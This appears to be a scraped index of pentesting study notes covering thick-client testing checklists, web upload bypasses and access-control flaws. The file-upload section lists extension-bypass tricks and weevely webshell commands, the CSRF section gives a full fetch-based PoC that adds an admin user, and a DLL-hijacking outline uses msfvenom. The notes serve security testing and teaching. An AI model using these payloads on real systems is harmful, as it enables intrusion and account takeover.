                                  **Test For Files Permission**\n\n- [ ]  Check permission for each and every file and folder\n\n**Test For File Continuity**\n\n- [ ]  Check strong naming\n- [ ]  Authenticate code signing\n\n**Test For File Content Debugging**\n\n- [ ]  Look for sensitive information on the file system (symbols, sensitive data, passwords, configurations)\n- [ ]  Look for sensitive information on the config file\n- [ ]  Look for Hardcoded encryption data\n- [ ]  Look for Clear text storage of sensitive data\n- [ ]  Look for side-channel data leakage\n- [ ]  Look for unreliable log\n\n**Test For File And Content Manipulation**\n\n- [ ]  Try framework backdooring\n- [ ]  Try DLL preloading\n- [ ]  Perform Race condition check\n- [ ]  Test for Files and content replacement\n- [ ]  Test for Client-side protection bypass using reverse engineering\n\n**Test For Function Exported**\n\n- [ ]  Try to find the exported functions\n- [ ]  Try to use the exported functions without authentication\n\n**Test For Public Methods**\n\n- [ ]  Make a wrapper to gain access to public methods without authentication\n\n**Test For Decompile And Application Rebuild**\n\n- [ ]  Try to recover the original source code, passwords, keys\n- [ ]  Try to decompile the application\n- [ ]  Try to rebuild the application\n- [ ]  Try to patch the application\n\n**Test For Decryption And DE obfuscation**\n\n- [ ]  Try to recover original source code\n- [ ]  Try to retrieve passwords and keys\n- [ ]  Test for lack of obfuscation\n\n**Test For Disassemble and Reassemble**\n\n- [ ]  Try to build a patched assembly\n\n**Tools Used**\n\n- [ ]  Strings\n- [ ]  dnSpy\n- [ ]  Procmon\n- [ ]  Process Explorer\n- [ ]  Process Hacker\n
                                  ","tags":["thick client applications","thick client applications pentesting","checklist"]},{"location":"thick-applications/thick-application-checklist/#registry-testing","title":"REGISTRY TESTING","text":"
                                  **Test For Registry Permissions**\n\n- [ ]  Check read access to the registry keys\n- [ ]  Check to write access to the registry keys\n\n**Test For Registry Contents**\n\n- [ ]  Inspect the registry contents\n- [ ]  Check for sensitive info stored on the registry\n- [ ]  Compare the registry before and after executing the application\n\n**Test For Registry Manipulation**\n\n- [ ]  Try for registry manipulation\n- [ ]  Try to bypass authentication by registry manipulation\n- [ ]  Try to bypass authorization by registry manipulation\n\n**Tools Used**\n\n- [ ]  Regshot\n- [ ]  Procmon\n- [ ]  Accessenum\n
                                  ","tags":["thick client applications","thick client applications pentesting","checklist"]},{"location":"thick-applications/thick-application-checklist/#network-testing","title":"NETWORK TESTING","text":"
                                  **Test For Network**\n\n- [ ]  Check for sensitive data in transit\n- [ ]  Try to bypass firewall rules\n- [ ]  Try to manipulate network traffic\n\n**Tools Used**\n\n- [ ]  Wireshark\n- [ ]  TCPview\n
                                  ","tags":["thick client applications","thick client applications pentesting","checklist"]},{"location":"thick-applications/thick-application-checklist/#assembly-testing","title":"ASSEMBLY TESTING","text":"
                                  **Test For Assembly**\n\n- [ ]  Verify Address Space Layout Randomization (ASLR)\n- [ ]  Verify SafeSEH\n- [ ]  Verify Data Execution Prevention (DEP)\n- [ ]  Verify strong naming\n- [ ]  Verify ControlFlowGuard\n- [ ]  Verify HighentropyVA\n\n**Tools Used**\n\n- [ ]  PESecurity\n
                                  ","tags":["thick client applications","thick client applications pentesting","checklist"]},{"location":"thick-applications/thick-application-checklist/#memory-testing","title":"MEMORY TESTING","text":"
                                  **Test For Memory Content**\n\n- [ ]  Check for sensitive data stored in memory\n\n**Test For Memory Manipulation**\n\n- [ ]  Try for memory manipulation\n- [ ]  Try to bypass authentication by memory manipulation\n- [ ]  Try to bypass authorization by memory manipulation\n\n**Test For Run Time Manipulation**\n\n- [ ]  Try to analyze the dump file\n- [ ]  Check for process replacement\n- [ ]  Check for modifying assembly in the memory\n- [ ]  Try to debug the application\n- [ ]  Try to identify dangerous functions\n- [ ]  Use breakpoints to test each and every functionality\n\n**Tools Used**\n\n- [ ]  Process Hacker\n- [ ]  HxD\n- [ ]  Strings\n
                                  ","tags":["thick client applications","thick client applications pentesting","checklist"]},{"location":"thick-applications/thick-application-checklist/#traffic-testing","title":"TRAFFIC TESTING","text":"
                                  **Test For Traffic**\n\n- [ ]  Analyze the flow of network traffic\n- [ ]  Try to find sensitive data in transit\n\n**Tools Used**\n\n- [ ]  Echo Mirage\n- [ ]  MITM Relay\n- [ ]  Burp Suite\n
                                  ","tags":["thick client applications","thick client applications pentesting","checklist"]},{"location":"thick-applications/thick-application-checklist/#common-vulnerabilities-testing","title":"COMMON VULNERABILITIES TESTING","text":"
                                  **Test For Common Vulnerabilities**\n\n- [ ]  Try to decompile the application\n- [ ]  Try for reverse engineering\n- [ ]  Try to test with OWASP WEB Top 10\n- [ ]  Try to test with OWASP API Top 10\n- [ ]  Test for DLL Hijacking\n- [ ]  Test for signature checks (Use Sigcheck)\n- [ ]  Test for binary analysis (Use Binscope)\n- [ ]  Test for business logic errors\n- [ ]  Test for TCP/UDP attacks\n- [ ]  Test with automated scanning tools (Use Visual Code Grepper - VCG)\n
                                  ","tags":["thick client applications","thick client applications pentesting","checklist"]},{"location":"thick-applications/thick-application-checklist/#shaped-by-hariprasaanth-r","title":"Shaped by: Hariprasaanth R","text":"

                                  Reach Me: LinkedIn Portfolio Github

                                  ","tags":["thick client applications","thick client applications pentesting","checklist"]},{"location":"thick-applications/tools-for-thick-apps/","title":"Tools for pentesting thick client applications","text":"

                                  General index of the course

                                  • Introduction.
                                  • Tools for pentesting thick client applications.
                                  • Basic lab setup.
                                  • First challenge: enabling a button.
                                  • Information gathering phase.
                                  • Traffic analysis.
                                  • Attacking thick clients applications.
                                  • Reversing and patching thick clients applications.
                                  • Common vulnerabilities.
                                  ","tags":["thick client applications","thick client applications pentesting","tools"]},{"location":"thick-applications/tools-for-thick-apps/#decompilation-tools","title":"Decompilation tools","text":"
                                  • C++ decompilation: https://ghidra-sre.org
                                  • C# decompilation: dnspy.
                                  • JetBrains dotPeek.
                                  ","tags":["thick client applications","thick client applications pentesting","tools"]},{"location":"thick-applications/tools-for-thick-apps/#read-app-metadata","title":"Read app metadata","text":"
                                  • CFF explorer. Open the app with CFF Explorer to see which language and tool was used for its creation.
                                  ","tags":["thick client applications","thick client applications pentesting","tools"]},{"location":"thick-applications/tools-for-thick-apps/#sniff-connections","title":"Sniff connections","text":"
                                  • TCP View from sysInternalsSuite.
                                  • Wireshark.
                                  ","tags":["thick client applications","thick client applications pentesting","tools"]},{"location":"thick-applications/tools-for-thick-apps/#traffic-monitoring","title":"Traffic monitoring","text":"
                                  • wireshark, it's ok if we just want to monitor.
                                  • Echo mirage, very old and not maintained.
                                  • mitm_relay + BurpSuite.
                                  ","tags":["thick client applications","thick client applications pentesting","tools"]},{"location":"thick-applications/tools-for-thick-apps/#static-analysis","title":"Static analysis","text":"","tags":["thick client applications","thick client applications pentesting","tools"]},{"location":"thick-applications/tools-for-thick-apps/#spot-hard-coded-credentials","title":"Spot hard coded credentials","text":"
                                  • Strings from sysInternalsSuite. It's similar to the command \"strings\" in bash. It displays all the human readable strings in a binary.
                                  • dnspy can be used to spot functions containing hard coded credentials (for connections,...).
                                  ","tags":["thick client applications","thick client applications pentesting","tools"]},{"location":"thick-applications/tools-for-thick-apps/#log-analysis","title":"Log analysis","text":"

                                  When debug mode is on, you can run:

                                  thick-app-name.exe > path/to/logs.txt\n
                                  Open the file with the logs of the application and, if you are lucky and debug mode is still on, you will be able to see some stuff such as SQL queries, decrypted database passwords, users, temp location of the ftp file...

                                  ","tags":["thick client applications","thick client applications pentesting","tools"]},{"location":"thick-applications/tools-for-thick-apps/#dynamic-analysis","title":"Dynamic analysis","text":"","tags":["thick client applications","thick client applications pentesting","tools"]},{"location":"thick-applications/tools-for-thick-apps/#changes-in-the-file-system","title":"Changes in the file system","text":"
                                  • ProcessMonitor tool from sysInternalsSuite to see changes in the file system. For instance, you can analyze the access to interesting files in the application directory in real time.
                                  ","tags":["thick client applications","thick client applications pentesting","tools"]},{"location":"thick-applications/tools-for-thick-apps/#spot-sensitive-data-in-registry-entries","title":"Spot sensitive data in Registry entries","text":"
                                  • ProcessMonitor tool from sysInternalsSuite to spot changes in the Registry Entries.
                                  • regshot allows you to compare two snapshots of registry entries (before opening the application and during executing the application).
                                  ","tags":["thick client applications","thick client applications pentesting","tools"]},{"location":"thick-applications/tools-for-thick-apps/#check-the-memory","title":"Check the memory","text":"

                                  Process Hacker tool During a a connection to database the code that does it may be in clear text or encrypted. If encrypted, it's still possible to find it in memory. Process Hacker tool dumps the memory of the process so we might find the clear text connection string in memory.

                                  ","tags":["thick client applications","thick client applications pentesting","tools"]},{"location":"thick-applications/tools-for-thick-apps/#scan-the-application","title":"Scan the application","text":"

                                  Visual Code grepper.

                                  ","tags":["thick client applications","thick client applications pentesting","tools"]},{"location":"thick-applications/tools-for-thick-apps/#attacks","title":"Attacks","text":"","tags":["thick client applications","thick client applications pentesting","tools"]},{"location":"thick-applications/tools-for-thick-apps/#dll-hickjacking","title":"DLL Hickjacking","text":"

                                  Step by step.

                                  1. Locate interesting DLL files with ProcessMonitor (or ProcMon).

                                  2. Craft malicious DLL with msfvenom from attacker machine.

                                  3. Serve it to the victime machine using an apache server.

                                  4. Placing the file in the same directory from where is going to be called.

                                  5. Run the app.

                                  ","tags":["thick client applications","thick client applications pentesting","tools"]},{"location":"thick-applications/tools-for-thick-apps/#reversing-net-applications","title":"Reversing .NET applications","text":"
                                  • dnspy: c# code + IL code + patching the application
                                  • dotPeek (from JetBrains)
                                  • ILspy / Reflexil
                                  • ILASM (IL Assembler) (comes with .NET Framework).
                                  • ILDASM (IL Disassembler) (comes with Visual Studio).

                                  How to do it?

                                  ","tags":["thick client applications","thick client applications pentesting","tools"]},{"location":"thick-applications/tools-for-thick-apps/#input-sanitization-sql-injections","title":"Input sanitization: SQL injections","text":"

                                  Manually

                                  ","tags":["thick client applications","thick client applications pentesting","tools"]},{"location":"thick-applications/tools-for-thick-apps/#application-signing","title":"Application Signing","text":"

                                  Sigcheck, from SysInternals Suite (more).

                                  ","tags":["thick client applications","thick client applications pentesting","tools"]},{"location":"thick-applications/tools-for-thick-apps/#compiler-protection","title":"Compiler protection","text":"

                                  Binscope.

                                  PESecurity is a powershell script that checks if a Windows binary (EXE/DLL) has been compiled with ASLR, DEP, SafeSEH, StrongNaming, Authenticode, Control Flow Guard, and HighEntropyVA.

                                  Also, check these other tools and resources:

                                  • WinSpy.
                                  • Window Detective
                                  • netspi.com.
                                  ","tags":["thick client applications","thick client applications pentesting","tools"]},{"location":"webexploitation/","title":"Web exploitation guide","text":"OWASP Attack Tools Payloads WSTG-INPV-12 Command injection attack
                                  • https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/CRLF%20Injection.
                                  • CRLF attack - Carriage Return and LineFeed attack
                                    • https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/CRLF%20Injection.
                                    • WSTG-SESS-05 CSRF attack - Cross Site Request Forgery attack BurpSuite, CSRFTester
                                      • PayloadsAllTheThings: https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/CSRF%20Injection.
                                      • OWASP: https://cheatsheetseries.owasp.org/cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html
                                      • Portswigger: https://portswigger.net/web-security/cross-site-scripting/cheat-sheet
                                      • Unleashing an Ultimate XSS Polyglot: https://github.com/0xsobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot
                                      • Directory traversal attack LFI attack - Local File Inclusion attack Remote Code Execution RFD attack - Reflected File Download attack Reflected File Download Checker - Burp Extension RFI attack - Remote File Inclusion attack Session Puzzling XSS-Me SSRF attack - Server Side Request Forgery Burp Collaborator, Burp Intruder, manually Built-in lists in Burp WSTG-INPV-05 SQL injection Cheat sheet for manual attack, sqlmap Payloads from my dictionary repo XFS attack - Cross-frame Scripting attack WSTG-INPV-01 WSTG-INPV-02 WSTG-CLNT-01 XSS attack - Cross-Site Scripting attack beef, XSSer, Easy-XSS, Manual testing, XSSMe tool on github
                                        • https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20Injection
                                        • https://github.com/payloadbox/xss-payload-list
                                        • https://gist.github.com/michenriksen/d729cd67736d750b3551876bbedbe626

                                        Public exploits

                                        We can use these resources: - searchsploit - ExploitDB. - Rapid7.com. - Vulnerability Lab. - metasploit: check verification scripts to test the existence of a vulnerability.

                                        ","tags":["pentesting","web","pentesting","exploitation"]},{"location":"webexploitation/arbitrary-file-upload/","title":"Arbitrary File Upload","text":"OWASP

                                        OWASP Web Security Testing Guide 4.2 > 10. Business logic Testing > 10.8. Test Upload of Unexpected File Types

                                        ID Link to Hackinglife Link to OWASP Description 10.8 WSTG-BUSL-08 Test Upload of Unexpected File Types - Review the project documentation for file types that are rejected by the system. - Verify that the unwelcomed file types are rejected and handled safely. Also, check whether the website only check for \"Content-type\" or file extension. - Verify that file batch uploads are secure and do not allow any bypass against the set security measures. 10.9 WSTG-BUSL-09 Test Upload of Malicious Files - Identify the file upload functionality. - Review the project documentation to identify what file types are considered acceptable, and what types would be considered dangerous or malicious. - If documentation is not available then consider what would be appropriate based on the purpose of the application. - Determine how the uploaded files are processed. - Obtain or create a set of malicious files for testing. - Try to upload the malicious files to the application and determine whether it is accepted and processed.

                                        An arbitrary file upload vulnerability is a type of security flaw in web applications that allows an attacker to upload and execute malicious files on a web server. This can have serious consequences, including unauthorized access to sensitive data, server compromise, and even complete system control. The vulnerability arises when the application fails to properly validate and secure the uploaded files. This means that the application may not check if the uploaded file is actually of the expected type (e.g., image, PDF), or it may not restrict the file's location or execution on the server.

                                        Exploitation: An attacker identifies the file upload functionality in the target application and attempts to upload a malicious file. This file can be crafted to include malicious code, such as PHP scripts, shell commands, or malware.

                                        Bypassing Validation: If the application doesn't properly validate file types or restricts file locations, the attacker can upload a file with a misleading extension (e.g., uploading a PHP file with a .jpg extension).

                                        ","tags":["pentesting","web","pentesting"]},{"location":"webexploitation/arbitrary-file-upload/#bypass-file-upload-restrictions","title":"Bypass file upload restrictions","text":"

                                        Uploaded files represent a significant risk to applications. The first step in many attacks is to get some code to the system to be attacked. Then the attack only needs to find a way to get the code executed. Using a file upload helps the attacker accomplish the first step.

                                        ","tags":["pentesting","web","pentesting"]},{"location":"webexploitation/arbitrary-file-upload/#cheat-sheet-for-php","title":"Cheat sheet for php","text":"

                                        Source: Repo from imran-parray OWASP deep explanation: link

                                        # try to upload a simple php file\nupload.php \n\n# To bypass the blacklist.\nupload.php.jpeg \n\n# To bypass the blacklist.\nupload.jpg.php\n#  and Then Change the content type of the file to image or jpeg.\nupload.php \n\n# version - 1 2 3 4 5 6 7\nupload.php*\n\n# To bypass The BlackList\nupload.PHP \nupload.PhP \nupload.pHp \n\n#  By uploading this [jpg,png] files can be executed as php with malicious code within it.\nupload .htaccess\n\n# To test againt the DOS.\npixelFlood.jpg\n\n#  upload gif file with 10^10 Frames\nframeflood.gif\n\n# upload UBER.jpg\nMalicious zTXT \n\n# Add backdoor in comments using Exiftool and \nupload.php [getimagesize() \n# rename the jpg file with php so that it will be execute. This Time The Verification of server is only limited to contents of the uploaded file not on the extension\n\n# backdoor in php chunks\nphppng.png \n\n# backdoor in php chunks \nxsspng.png \n
                                        ","tags":["pentesting","web","pentesting"]},{"location":"webexploitation/arbitrary-file-upload/#execute-a-file-uploaded-as-an-image-in-nginx","title":"Execute a file uploaded as an image in nginx","text":"

                                        After bypassing a file upload feature (using .jpg extension but php mimetype), the file is treated by the application as an image.

                                        How to bypass that situation? This works in some versions of nginx server:

                                        # After the name of the file with the jpg extension, add slash and the name of the file with the uploaded and accepted mimetype php. After that you can use the CMD command of the webshell.\n\nhttps://example.com/uploads/lolo.jpg/lolo.php?cmd=pwd\n

                                        ","tags":["pentesting","web","pentesting"]},{"location":"webexploitation/arbitrary-file-upload/#tools","title":"Tools","text":"

                                        Generate a php webshell with Weevely and saving it an image:

                                        weevely generate secretpassword example.png \n

                                        Upload it to the application.

                                        Make the connection with weevely:

                                        weevely https://example.com/uploads/example.jpg/example.php secretpassword\n

                                        ","tags":["pentesting","web","pentesting"]},{"location":"webexploitation/arbitrary-file-upload/#bypass-php-version-based-file-extension-filters-when-running-the-file","title":"Bypass PHP version-based file extension filters when running the file","text":"

                                        Sometimes a web server may prevent some php files from running based on their php version. A way of bypassing this situation is indicating in the extension of the file, the version you want to upload.

                                        shell.php7\n

                                        In this case, the uploaded file could be executed in php v7.

                                        ","tags":["pentesting","web","pentesting"]},{"location":"webexploitation/broken-access-control/","title":"Broken access control","text":"OWASP

                                        OWASP Web Security Testing Guide 4.2 > 5. Authorization Testing > 5.2. Testing for Bypassing Authorization Schema

                                        ID Link to Hackinglife Link to OWASP Description 5.2 WSTG-ATHZ-02 Testing for Bypassing Authorization Schema - Assess if horizontal or vertical access is possible. - Access to Administrative functions by force browsing (/admin/addUser)

                                        Access control\u00a0determines whether the user is allowed to carry out the action that they are attempting to perform. In the context of web applications, access control is dependent on authentication and session management.

                                        • Authentication\u00a0confirms that the user is who they say they are.
                                        • Session management\u00a0identifies which subsequent HTTP requests are being made by that same user.

                                        Types of broken access control:

                                        • Vertical access control: a regular user can access or perform operations on endpoints reserved to admins.
                                        • Horizontal access control: a regular user can access resources or perform operations on other users.
                                        • Context-dependent access control: Context-dependent access controls restrict access to functionality and resources based upon the state of the application or the user's interaction with it. For example, a retail website might prevent users from modifying the contents of their shopping cart after they have made payment.
                                        ","tags":["web pentesting","attack"]},{"location":"webexploitation/broken-access-control/#exploitation","title":"Exploitation","text":"

                                        This is how you usually test these vulnerabilities:

                                        ","tags":["web pentesting","attack"]},{"location":"webexploitation/broken-access-control/#unprotected-functionality","title":"Unprotected functionality","text":"

                                        At its most basic, vertical privilege escalation arises where an application does not enforce any protection for sensitive functionality. Example: accessing /admin panel (or a less obvious url for the admin functionality.)

                                        ","tags":["web pentesting","attack"]},{"location":"webexploitation/broken-access-control/#parameter-based-access-control-methods","title":"Parameter-based access control methods","text":"

                                        When the application makes access control decisions based on a submitted value.

                                        https://insecure-website.com/login/home.jsp?admin=true\n

                                        This approach is insecure because a user can modify the value and access functionality they're not authorized to, such as administrative functions. In the following example, I'm the user wiener, but I can access to user carlos information by modifying the parameter id in the request:

                                        GET /my-account?id=carlos HTTP/2\n

                                        For GUID and obfuscated parameters, you can chain a data exposure vulnerability with this. Also, an IDOR.

                                        ","tags":["web pentesting","attack"]},{"location":"webexploitation/broken-access-control/#url-override-methods","title":"URL override methods","text":"

                                        There are\u00a0various non-standard HTTP headers that can be used to override the URL in the original request, such as\u00a0X-Original-URL\u00a0and\u00a0X-Rewrite-URL.

                                        If a website uses rigorous front-end controls to restrict access based on the URL, but the application allows the URL to be overridden via a request header, then:

                                        POST / HTTP/1.1\nHost: target.com\nX-Original-URL: /admin/deleteUser \n...\n
                                        ","tags":["web pentesting","attack"]},{"location":"webexploitation/broken-access-control/#url-matching-discrepancies","title":"URL-matching discrepancies","text":"

                                        Websites can vary in how strictly they match the path of an incoming request to a defined endpoint.

                                        • For example, they may tolerate inconsistent capitalization, so a request to\u00a0/ADMIN/DELETEUSER\u00a0may still be mapped to the\u00a0/admin/deleteUser\u00a0endpoint. If the access control mechanism is less tolerant, it may treat these as two different endpoints and fail to enforce the correct restrictions as a result.
                                        • Spring framework with useSuffixPatternMatch\u00a0option enabled allows paths with an arbitrary file extension to be mapped to an equivalent endpoint with no file extension.
                                        • On other systems, you may encounter discrepancies in whether\u00a0/admin/deleteUser\u00a0and\u00a0/admin/deleteUser/
                                        ","tags":["web pentesting","attack"]},{"location":"webexploitation/broken-access-control/#idors","title":"IDORS","text":"

                                        IDORs occur if an application uses user-supplied input to access objects directly and an attacker can modify the input to obtain unauthorized access.

                                        ","tags":["web pentesting","attack"]},{"location":"webexploitation/broken-access-control/#abusing-referer-request-header","title":"Abusing Referer Request header","text":"

                                        The\u00a0Referer\u00a0header can be added to requests by browsers to indicate which page initiated a request.

                                        For example, an application robustly enforces access control over the main administrative page at\u00a0/admin, but for sub-pages such as\u00a0/admin/deleteUser\u00a0only inspects the\u00a0Referer\u00a0header. If the\u00a0Referer\u00a0header contains the main\u00a0/admin\u00a0URL, then the request is allowed.

                                        ","tags":["web pentesting","attack"]},{"location":"webexploitation/broken-access-control/#other-headers-to-consider-for-location-base-control","title":"Other Headers to Consider for location-base control","text":"

                                        Often admin panels or administrative related bits of functionality are only accessible to clients on local networks, therefore it may be possible to abuse various proxy or forwarding related HTTP headers to gain access. Some headers and values to test with are:

                                        • Headers:
                                          • X-Forwarded-For
                                          • X-Forward-For
                                          • X-Remote-IP
                                          • X-Originating-IP
                                          • X-Remote-Addr
                                          • X-Client-IP
                                        • Values
                                          • 127.0.0.1\u00a0(or anything in the\u00a0127.0.0.0/8\u00a0or\u00a0::1/128\u00a0address spaces)
                                          • localhost
                                          • Any\u00a0RFC1918\u00a0address:
                                            • 10.0.0.0/8
                                            • 172.16.0.0/12
                                            • 192.168.0.0/16
                                          • Link local addresses:\u00a0169.254.0.0/16
                                        ","tags":["web pentesting","attack"]},{"location":"webexploitation/buffer-overflow/","title":"Buffer Overflow attack","text":"

                                        A buffer is an area in the RAM (Random Access Memory) reserved for temporary data storage. If a developer does not enforce buffer\u2019s limits, an attacker could find a way to write data beyond those limits.

                                        A stack is a data structure used to store the data. Two approaches: LIFO and FIFO Two methods: push (adds elements to the stack) and pop (removes elements from the stack)

                                        ","tags":["web pentesting","attack"]},{"location":"webexploitation/captcha-replay-attack/","title":"Captcha Replay attack","text":"

                                        Captcha replay attack is a vulnerability in which the Captcha validation system accepts old Captcha values which have already expired. This is sometimes considered legitimate behavior (as would be expected if the user refreshed the browser after submitting a successful captcha), however in many cases, such functionality would make the captcha significantly less effective at preventing automation.

                                        In this case, the attacker resubmitted a request that had already been successfully validated through a captcha, and \"replay\" was explicitly disabled for the captcha. This is not necessarily a malicious incident on its own, because the user can have accidentally refreshed the browser, however multiple attempts would definitely represent malicious intent.

                                        ","tags":["web pentesting","attack"]},{"location":"webexploitation/carriage-return-and-linefeed-crlf/","title":"Carriage Return and Linefeed - CRLF Attack","text":"

                                        Source: Owasp description: https://owasp.org/www-community/vulnerabilities/CRLF_Injection.

                                        ","tags":["web pentesting","attack"]},{"location":"webexploitation/carriage-return-and-linefeed-crlf/#description","title":"Description","text":"

                                        A CRLF Injection attack occurs when a user manages to submit a CRLF into an application. This is most commonly done by modifying an HTTP parameter or URL. CRLF is the acronym used to refer to Carriage Return (\\r) Line Feed (\\n). As one might notice from the symbols in the brackets, \u201cCarriage Return\u201d refers to the end of a line, and \u201cLine Feed\u201d refers to the new line.

                                        The term CRLF refers to Carriage Return (ASCII 13, \\r) Line Feed (ASCII 10, \\n). They\u2019re used to note the termination of a line, however, dealt with differently in today\u2019s popular Operating Systems. For example: in Windows both a CR and LF are required to note the end of a line, whereas in Linux/UNIX a LF is only required. In the HTTP protocol, the CR-LF sequence is always used to terminate a line.

                                        ","tags":["web pentesting","attack"]},{"location":"webexploitation/carriage-return-and-linefeed-crlf/#tools-and-payloads","title":"Tools and payloads","text":"
                                        • See updated chart: Attacks and tools for web pentesting.
                                        ","tags":["web pentesting","attack"]},{"location":"webexploitation/cross-frame-scripting-xfs/","title":"XFS attack - Cross-frame Scripting","text":"","tags":["web pentesting","attack"]},{"location":"webexploitation/cross-frame-scripting-xfs/#tools-and-payloads","title":"Tools and payloads","text":"
                                        • See updated chart: Attacks and tools for web pentesting.
                                        ","tags":["web pentesting","attack"]},{"location":"webexploitation/cross-site-request-forgery-csrf/","title":"CSRF attack - Cross Site Request Forgery","text":"OWASP

                                        OWASP Web Security Testing Guide 4.2 > 6. Session Management Testing > 6.5. Testing for Cross Site Request Forgery

                                        ID Link to Hackinglife Link to OWASP Description 6.5 WSTG-SESS-05 Testing for Cross Site Request Forgery - Determine whether it is possible to initiate requests on a user's behalf that are not initiated by the user. - Conduct URL analysis, Direct access to functions without any token.

                                        Cross Site Request Forgery (CSRF) is a type of web security vulnerability that occurs when an attacker tricks a user into performing actions on a web application without their knowledge or consent. A successful CSRF exploit can compromise end user data and operation when it targets a normal user. If the targeted end user is the administrator account, a CSRF attack can compromise the entire web application.

                                        CSRF vulnerabilities may arise when applications rely solely on HTTP cookies to identify the user that has issued a particular request. Because browsers automatically add cookies to requests regardless of the request's origin, it may be possible for an attacker to create a malicious web site that forges a cross-domain request to the vulnerable application.

                                        Three conditions that enable CSRF:

                                        • A relevant action.
                                        • Cookie-based session handling.
                                        • No unpredictable request parameters.
                                        ","tags":["web","pentesting","attack","HTTP","headers"]},{"location":"webexploitation/cross-site-request-forgery-csrf/#how-it-works","title":"How it works","text":"
                                        The attacker crafts a malicious request (e.g., changing the user's email address or password) and embeds it in a web page, email, or some other form of content.\n\nThe attacker lures the victim into loading this content while the victim is authenticated in the target web application.\n\nThe victim's browser automatically sends the malicious request, including the victim's authentication cookie.\n\nThe web application, trusting the request due to the authentication cookie, processes it, causing the victim's account to be compromised or modified.\n

                                        CSRF attacks can have serious consequences:

                                        • Unauthorized changes to a user's account settings.
                                        • Fund transfers or actions on behalf of the user without their consent.
                                        • Malicious actions like changing passwords, email addresses, or profile information.
                                        ","tags":["web","pentesting","attack","HTTP","headers"]},{"location":"webexploitation/cross-site-request-forgery-csrf/#how-to-test-csrf-by-using-burpsuite-proof-of-concept","title":"How to test CSRF by using Burpsuite proof of concept","text":"

                                        Burp has a quite awesome PoC so you can generate HTML (and javascript) code to replicate this attack.

                                        1. Select a URL or HTTP request anywhere within Burp, and choose Generate CSRF PoC within Engagement tools in the context menu.

                                        2. You have two buttons: one for editing the request manually (Regenerate button) the HTML based on the updated request; and tje ptjer to test the effectiveness of the generated PoC in Burp's browser (Test in browser button).

                                        3. Open the crafted page from the same browser where the user has been logged in.

                                        4. Observe the result, i.e. check if the web server executed the request.

                                        ","tags":["web","pentesting","attack","HTTP","headers"]},{"location":"webexploitation/cross-site-request-forgery-csrf/#fetch-api","title":"Fetch API","text":"

                                        Requirements:

                                        1. Authentication Method should be cookie based only
                                        2. No Authentication Token in Header
                                        3. Same-Origin Policy should not be enforced

                                        Browser -> Network tab in development tools, right click on request and copy as fetch:

                                        ","tags":["web","pentesting","attack","HTTP","headers"]},{"location":"webexploitation/cross-site-request-forgery-csrf/#json-csrf","title":"Json CSRF","text":"

                                        Resources: https://systemweakness.com/ways-to-exploit-json-csrf-simple-explanation-5e77c403ede6

                                        POC: source rootsploit.com

                                        # Change the URL and Body from the PoC file to perform the CSRF on JSON Endpoint.\n<html>\n<title>CSRF Exploit POC by RootSploit</title>\n\n<body>\n    <center>\n        <h1> CSRF Exploit POC by RootSploit</h1>\n\n        <script>\n            function JSON_CSRF() {\n                fetch('https://vuln.rootsploit.io/v1/addusers', { method: 'POST', credentials: 'include', headers: { 'Content-Type': 'application/json' }, body: '{\"user\":{\"role_id\":\"full_access\",\"first_name\":\"RootSploit\",\"last_name\":\"RootSploit\",\"email\":\"csrf-test@rootsploit.com\",\"password\":\"Password@\",\"confirm_password\":\"Password@\",\"mobile_number\":\"99999999999\"}}' });\n                window.location.href=\"https://rootsploit.com/csrf\"\n            }\n        </script>\n\n        <button onclick=\"JSON_CSRF()\">Exploit CSRF</button>\n    </center>\n</body>\n\n</html>\n
                                        ","tags":["web","pentesting","attack","HTTP","headers"]},{"location":"webexploitation/cross-site-request-forgery-csrf/#mitigation","title":"Mitigation","text":"

                                        Cross-Site Request Forgery Prevention Cheat Sheet

                                        ","tags":["web","pentesting","attack","HTTP","headers"]},{"location":"webexploitation/cross-site-request-forgery-csrf/#related-labs","title":"Related labs","text":"
                                        • https://portswigger.net/web-security/all-labs#cross-site-request-forgery-csrf
                                        ","tags":["web","pentesting","attack","HTTP","headers"]},{"location":"webexploitation/cross-site-request-forgery-csrf/#resources","title":"Resources","text":"

                                        When it comes to web vulnerabilities, it is useful to have some links at hand:

                                        • Owasp vuln description: https://owasp.org/www-community/attacks/csrf.
                                        • Using Burp to Test for Cross-Site Request Forgery (CSRF): https://portswigger.net/support/using-burp-to-test-for-cross-site-request-forgery.
                                        • PoC with Burp, official link: https://portswigger.net/burp/documentation/desktop/functions/generate-csrf-poc.
                                        ","tags":["web","pentesting","attack","HTTP","headers"]},{"location":"webexploitation/cross-site-request-forgery-csrf/#tools-and-payloads","title":"Tools and payloads","text":"
                                        • See updated chart: Attacks and tools for web pentesting.
                                        ","tags":["web","pentesting","attack","HTTP","headers"]},{"location":"webexploitation/cross-site-scripting-xss/","title":"XSS attack - Cross-Site Scripting","text":"OWASP reference

                                        OWASP Web Security Testing Guide 4.2 > 7. Data Validation Testing > 7.2. Testing for Stored Cross Site Scripting

                                        ID Link to Hackinglife Link to OWASP Description 7.1 WSTG-INPV-01 Testing for Reflected Cross Site Scripting - Identify variables that are reflected in responses. - Assess the input they accept and the encoding that gets applied on return (if any). 7.2 WSTG-INPV-02 Testing for Stored Cross Site Scripting - Identify stored input that is reflected on the client-side. - Assess the input they accept and the encoding that gets applied on return (if any). 11.1 WSTG-CLNT-01 Testing for DOM-Based Cross Site Scripting - Identify DOM sinks. - Build payloads that pertain to every sink type. Sources for these notes
                                        • My Ine: eWPTv2.
                                        • Hacktricks.
                                        • XSS Filter Evasion Cheat Sheet\u00b6.
                                        • OWASP: WSTG.
                                        • Notes during the Cibersecurity Bootcamp at The Bridge.
                                        • Experience pentesting applications.

                                        Cross-Site scripting (XSS) is a client-side web vulnerability that allows attackers to inject malicious scripts into web pages. This vulnerability is typically caused by a lack of input sanitization/validation in web applications. Attackers leverage XSS vulnerabilities to inject malicious code into web applications. Because XSS is a client side vulnerability, these scripts are executed by the victims browser. XSS vulnerabilities affect web applications that lack input validation and leverage client-side scripting languages like Javascript, Flash, CSS etc.

                                        # Quick steps to test XSS \n# 1. Find a reflection point (inspect source code and expand all tags to make sure that it's really a reflection point and it's not parsing your input)\n# 2. Test with <i> tag\n# 3. Test with HTML/JavaScript code (alert('XSS'))\n

